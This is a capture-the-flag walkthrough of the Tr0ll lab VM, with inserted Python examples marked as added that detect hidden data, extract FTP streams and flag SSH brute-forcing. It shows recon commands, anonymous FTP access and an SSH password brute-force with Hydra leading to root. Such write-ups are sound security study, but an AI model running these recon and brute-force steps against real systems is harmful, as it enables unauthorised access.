[WriteUp] Tr0ll


Let’s scan our network to find the machine first.

nmap -sn 172.18.2.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-11 13:39 +03
Nmap scan report for 172.18.2.1
Host is up (0.019s latency).
MAC Address: 00:50:56:01:06:28 (VMware)
Nmap scan report for 172.18.2.144
Host is up (0.00065s latency).
MAC Address: 08:00:27:62:C8:63 (Oracle VirtualBox virtual NIC)
Nmap scan report for 172.18.2.141
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 27.97 seconds

Ok, its IP address is 172.18.2.144.

Let’s dig deeper.

nmap -A 172.18.2.144

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-11 13:46 +03
Nmap scan report for 172.18.2.144
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.18.2.141
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:62:C8:63 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 172.18.2.144

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.34 seconds

Ok, we have FTP, SSH and HTTP running on their default ports, and the FTP server allows anonymous login.

Let’s see what is on the web server.

[screenshot: tr0ll1]

Ok, that’s cute. Let’s check the source code.

<html>
<img src=hacker.jpg>
</html>

Meh, nothing.

Rule! If there is a web server, there is probably a robots.txt.

http://172.18.2.144/robots.txt

User-agent:*
Disallow: /secret

Gotcha!

[screenshot: tr0ll2]

Seems not. 😦 Source?

<html>
<img src="troll.jpg">
</html>

No luck. I tried to download and scan the image with binwalk to see if there is something hidden.

# binwalk troll_original.jpg

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01

Hmm, it seems to be a simple, legit jpg image.
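The binwalk run above reports a single JPEG signature at offset 0, which means nothing is appended after the image. As an added example (not code from the write-up or from binwalk), here is the check that reasoning rests on: walk the JPEG segment structure to the End-Of-Image marker, then report anything stored after it and match it against a few well-known file signatures. The sample JPEG bytes and the appended ZIP header are constructed inline; the marker walk follows the JPEG spec (segments carry a 2-byte length, scan data may contain stuffed 0xFF00 bytes and RST markers).

```python
"""Report data hidden after a JPEG's End-Of-Image (EOI) marker.

Added example, not part of the original write-up. A clean JPEG starts with
SOI (FF D8) and ends with EOI (FF D9); bytes after EOI are ignored by image
viewers, which makes that gap a common hiding place for archives or scripts.
"""
import struct

SOI = b"\xff\xd8"
# Signatures binwalk would also flag if they appeared after the image.
KNOWN_SIGNATURES = {
    b"PK\x03\x04": "ZIP archive",
    b"\x7fELF": "ELF executable",
    b"Rar!\x1a\x07": "RAR archive",
    b"\x1f\x8b": "gzip data",
}


def _is_real_marker(data, pos):
    """True if data[pos:pos+2] is a marker other than a stuffed byte or RST0-RST7."""
    nxt = data[pos + 1]
    return data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7)


def find_eoi(data):
    """Return the offset just past EOI by walking segments, rather than
    trusting the last FF D9 in the file (which could sit inside appended data)."""
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI
            return pos + 2
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + length                       # length counts its own 2 bytes
        if marker == 0xDA:                      # SOS: entropy-coded data follows
            while pos + 1 < len(data) and not _is_real_marker(data, pos):
                pos += 1
    raise ValueError("no EOI marker found")


def trailing_data(data):
    """None for a clean file, else the offset, length and guessed type of the extra bytes."""
    end = find_eoi(data)
    extra = data[end:]
    if not extra:
        return None
    label = "unknown data"
    for sig, name in KNOWN_SIGNATURES.items():
        if extra.startswith(sig):
            label = name
            break
    return {"offset": end, "length": len(extra), "type": label}


# Constructed minimal JPEG: SOI, APP0/JFIF header, SOS header, scan data
# containing a stuffed byte (FF 00) and an RST0 marker (FF D0), then EOI.
CLEAN_JPEG = (
    SOI
    + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x12\x34\xff\x00\x56\xff\xd0\x78"
    + b"\xff\xd9"
)
# The same image with a ZIP local-file header and some bytes appended.
STUFFED_JPEG = CLEAN_JPEG + b"PK\x03\x04" + b"payload"

if __name__ == "__main__":
    print("clean:", trailing_data(CLEAN_JPEG))
    print("stuffed:", trailing_data(STUFFED_JPEG))
```

On a real file, read it in binary mode and pass the bytes to trailing_data(); a non-None result is the cue to carve the extra bytes out and identify them, which is what binwalk -e automates.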

Let me see what else is under the secret directory.

dirb http://172.18.2.144/secret/

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Wed Oct 11 14:09:22 2017
URL_BASE: http://172.18.2.144/secret/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://172.18.2.144/secret/ —-
+ http://172.18.2.144/secret/index.html (CODE:200|SIZE:37)

—————–
END_TIME: Wed Oct 11 14:09:23 2017
DOWNLOADED: 4612 - FOUND: 1

Nothing, other than the simple index.html.

I want to continue with the FTP at this point. As you remember, it allows anonymous login.

# ftp 172.18.2.144
Connected to 172.18.2.144.
220 (vsFTPd 3.0.2)
Name (172.18.2.144:mert): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp>
ftp> bin
200 Switching to Binary mode.
ftp> get lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00114 seconds (6.76 Mbytes/s)
ftp> quit
221 Goodbye.

That was quick and easy. 🙂 Time to fire up Wireshark.

Here is the interesting part of that capture file:

[screenshot: tr0ll3]

FTP is a clear-text protocol, so if I tell Wireshark to follow that FTP-DATA TCP stream…

Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛 Sucks, you were so close… gotta TRY HARDER!

Well, this is fun. 🙂
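What Wireshark's "Follow TCP Stream" does with lol.pcap can be reproduced with a few dozen lines of Python, which also makes the point about clear-text FTP concrete: the control channel (port 21) carries the login and commands, and the active-mode data channel (port 20) carries file contents, all readable to anyone holding the capture. The script below is an added example, not code from the write-up; it parses the classic libpcap file layout directly (no scapy), and the capture it reads is constructed inline with assumed addresses, ports and text standing in for the real lol.pcap.

```python
"""Pull clear-text FTP traffic out of a libpcap capture.

Added example, not part of the original write-up. Walks the pcap record
headers, decodes Ethernet/IPv4/TCP just far enough to find the payload, and
concatenates payload per (src, sport, dst, dport) for flows on ports 20/21,
which is what "Follow TCP Stream" shows for one direction of a conversation.
"""
import socket
import struct
from collections import defaultdict

ETHERTYPE_IPV4 = b"\x08\x00"
PROTO_TCP = 6


def _frame(src_ip, sport, dst_ip, dport, payload):
    """Build one constructed pcap record: Ethernet + IPv4 + TCP (PSH/ACK) + payload."""
    eth = b"\xaa" * 6 + b"\xbb" * 6 + ETHERTYPE_IPV4          # placeholder MACs
    tcp = struct.pack(">HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, PROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    frame = eth + ip + tcp
    return struct.pack("<IIII", 1507721000, 0, len(frame), len(frame)) + frame


# Constructed capture: pcap global header (little-endian, LINKTYPE_ETHERNET)
# plus a login on the control channel and a file body on the data channel.
SAMPLE_PCAP = (
    struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    + _frame("172.18.2.141", 54321, "172.18.2.144", 21, b"USER anonymous\r\n")
    + _frame("172.18.2.144", 21, "172.18.2.141", 54321, b"230 Login successful.\r\n")
    + _frame("172.18.2.144", 20, "172.18.2.141", 54322,
             b"Well, well, well, aren't you just a clever little devil... gotta TRY HARDER!\n")
)


def extract_tcp_streams(pcap, ports=(20, 21)):
    """Map (src, sport, dst, dport) -> concatenated payload for flows touching `ports`."""
    (magic,) = struct.unpack("<I", pcap[:4])
    if magic == 0xA1B2C3D4:
        end = "<"                                 # file written little-endian
    elif magic == 0xD4C3B2A1:
        end = ">"                                 # file written big-endian
    else:
        raise ValueError("not a classic libpcap file (pcapng is not handled here)")
    (linktype,) = struct.unpack(end + "I", pcap[20:24])
    if linktype != 1:
        raise ValueError("only Ethernet captures are handled")

    streams = defaultdict(bytes)
    pos = 24
    while pos + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(end + "IIII", pcap[pos:pos + 16])
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != ETHERTYPE_IPV4:
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4                  # IPv4 header length in bytes
        if ip[9] != PROTO_TCP:
            continue
        (total_len,) = struct.unpack(">H", ip[2:4])
        src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack(">HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]        # skip the TCP header (data offset)
        if payload and (sport in ports or dport in ports):
            streams[(src, sport, dst, dport)] += payload
    return dict(streams)


if __name__ == "__main__":
    for flow, data in extract_tcp_streams(SAMPLE_PCAP).items():
        print(flow, data.decode("ascii", "replace").rstrip())
```

For a capture from disk, replace SAMPLE_PCAP with open("lol.pcap", "rb").read(). The parser deliberately ignores sequence numbers and retransmissions, so on a noisy capture it is a triage tool rather than a reassembler; the defensive takeaway is the same as the write-up's: anything sent over FTP, including credentials, is recoverable by whoever can see the packets, which is why SFTP or FTPS should replace it.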

Here are the contents of http://172.18.2.144/sup3rs3cr3tdirlol/

[screenshot: tr0ll4]

What is that roflmao? There is only one way to find out: download it and play with it.

First of all, let me see what kind of file it is.

# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

It is a binary!

# strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6590
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
roflmao.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
printf@@GLIBC_2.0
_edata
_fini
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
_init

Seems like C code. I admit I was stuck at this point for a while, as I couldn't figure out what to do next. I tried several things, but in the end it was as simple as typing http://172.18.2.144/0x0856BF/

It was a huge facepalm moment for me: the message told me to find the address 0x0856BF, and I was overcomplicating it. Clearly, by "address" it meant a web address.
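Most of the strings output above is linker and section-name noise; the single line that matters is the hint in .rodata. As an added example (not code from the write-up), here is the part of strings that matters, printable-ASCII runs of at least four bytes, followed by a triage pass that keeps only lines containing hint-like words and pulls out any 0x-prefixed tokens, so the puzzle text surfaces without reading 80 lines by hand. The byte blob it scans is constructed to mimic the roflmao output shown above; it is not the real binary.

```python
"""A simplified `strings`, plus a triage filter for hint-like text.

Added example, not part of the original write-up. find_strings() returns
(offset, text) for each run of printable ASCII; triage() keeps runs that
mention words such as "address" or "password" and extracts hex tokens, which
here is a web path rather than a memory address, as the write-up found.
"""
import re

HEX_TOKEN = re.compile(r"0x[0-9A-Fa-f]+")

# Constructed stand-in for the roflmao binary: ELF-like header bytes,
# a few dynamic-linker strings, non-printable filler, the hint, and the
# compiler comment. Only the strings match the real output; the layout is made up.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01" + b"\x00" * 9
    + b"/lib/ld-linux.so.2\x00libc.so.6\x00printf\x00"
    + b"\x00\x01\x02\x03" * 4
    + b"Find address 0x0856BF to proceed\x00"
    + b"GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2\x00"
)


def find_strings(data, min_len=4):
    """Return [(offset, text)] for every run of >= min_len printable ASCII bytes (0x20-0x7e)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]


def triage(data, keywords=("address", "password", "proceed", "flag", "secret")):
    """Keep only strings that contain a keyword, with any hex tokens they carry."""
    hits = []
    for offset, text in find_strings(data):
        lowered = text.lower()
        if any(word in lowered for word in keywords):
            hits.append({"offset": offset, "text": text, "hex_tokens": HEX_TOKEN.findall(text)})
    return hits


if __name__ == "__main__":
    for offset, text in find_strings(SAMPLE_BINARY):
        print(f"{offset:#08x}  {text}")
    print("hints:", triage(SAMPLE_BINARY))
```

On a real file, pass open("roflmao", "rb").read() instead of SAMPLE_BINARY. The offsets are file offsets, not virtual addresses; to map a hit back to its section you would read the ELF section headers, which is what readelf -S does.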

Anyway, let’s see the contents.

[screenshot: tr0ll5]

In the this_folder_contains_the_password directory there is a file called Pass.txt with "Good_job_:)" written in it. Ok, this will probably be our password.

Similarly, the good_luck directory has a file called "which_one_lol.txt" with ten words in it. I presume our username will be one of them.

Let’s fire up Hydra and attack the ssh server with this information.

# hydra 172.18.2.144 ssh -L usernames.txt -P passwords.txt
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-11 14:45:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://172.18.2.144:22/
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-11 14:45:55

Huh? Nothing?

This was the second time I was trolled by this VM. I again fell into its trap and started to overthink, whereas the answer was very simple. The directory was called "this_folder_contains_the_password". What does it contain? "Pass.txt". <insert facepalm here>

Let’s try again with the password “Pass.txt”

# hydra 172.18.2.144 ssh -L usernames.txt -p Pass.txt
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-11 14:57:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://172.18.2.144:22/
[22][ssh] host: 172.18.2.144 login: overflow password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-11 14:57:14

Oh, sweet victory.
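From the server's side, the two Hydra runs above look like a burst of ten SSH logins from one address inside a few seconds, nine of them failing, followed by one success. That shape is easy to detect in sshd's log. The script below is an added example (not from the write-up) that parses "Failed password" / "Accepted password" lines in the format Ubuntu's sshd writes to /var/log/auth.log, groups them by source address, and flags any source with at least `threshold` failures inside a `window`-second span, recording whether a login succeeded in that span. The log lines are constructed: the host name, PIDs, client ports and the guessN user names are placeholders, while the attacker address and the overflow account are taken from the write-up.

```python
"""Flag SSH password-guessing bursts in sshd auth-log lines.

Added example, not part of the original write-up. parse_auth_log() turns
syslog-style sshd lines into events; detect_bruteforce() reports, per source
IP, the first window holding >= threshold failures and any success within it.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed log: nine failed guesses and one success from the attacking
# host within two seconds, a PAM line the parser must skip, and one unrelated
# failure from another address that should not be flagged.
CONSTRUCTED_LOG = (
    [f"Oct 11 14:57:12 tr0ll sshd[{1200 + i}]: Failed password for invalid user guess{i} "
     f"from 172.18.2.141 port {40100 + i} ssh2" for i in range(9)]
    + [
        "Oct 11 14:57:14 tr0ll sshd[1210]: Accepted password for overflow from 172.18.2.141 port 40110 ssh2",
        "Oct 11 14:57:14 tr0ll sshd[1210]: pam_unix(sshd:session): session opened for user overflow by (uid=0)",
        "Oct 11 15:30:01 tr0ll sshd[1300]: Failed password for root from 10.0.0.5 port 51000 ssh2",
    ]
)


def parse_auth_log(lines, year=2017):
    """Return (timestamp, result, user, ip) tuples; syslog lines carry no year, so one is supplied."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(lines, threshold=5, window=60):
    """Per source IP: failure count in the first window reaching the threshold,
    the user names tried, and the account that succeeded inside it (if any)."""
    by_ip = defaultdict(list)
    for event in parse_auth_log(lines):
        by_ip[event[3]].append(event)

    findings = {}
    for ip, events in by_ip.items():
        events.sort()
        failures = [e for e in events if e[1] == "Failed"]
        for ts, *_ in failures:
            limit = ts + timedelta(seconds=window)
            burst = [e for e in failures if ts <= e[0] <= limit]
            if len(burst) >= threshold:
                success = next((e for e in events if e[1] == "Accepted" and ts <= e[0] <= limit), None)
                findings[ip] = {
                    "failures": len(burst),
                    "users": sorted({e[2] for e in burst}),
                    "success_user": success[2] if success else None,
                }
                break
    return findings


if __name__ == "__main__":
    for ip, info in detect_bruteforce(CONSTRUCTED_LOG).items():
        print(ip, info)
```

Feed it the real file with open("/var/log/auth.log").read().splitlines(). A finding with success_user set is the one worth paging on: the guessing worked, and the session that followed is the thing to investigate. Hydra's own warning about parallel tasks points at the mitigation on the server side: sshd's MaxStartups throttles unauthenticated connections, and a ban rule such as fail2ban's sshd jail turns the same counting logic into a block.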

Let’s login.

At this point I tried to gather as much information as possible, but had no luck. As a last resort, I searched exploit-db for a vulnerability. The server was running Ubuntu 14.04.1 LTS.

Fortunately, there was an exploit written in C; the only obstacle was compiling it. I downloaded the exploit to the server and compiled it with gcc.

It compiled quickly, and when I ran it, it gave me root access.

There was a file called proof.txt in the root’s home directory. I got it! 🙂

# less proof.txt

Good job, you did it!
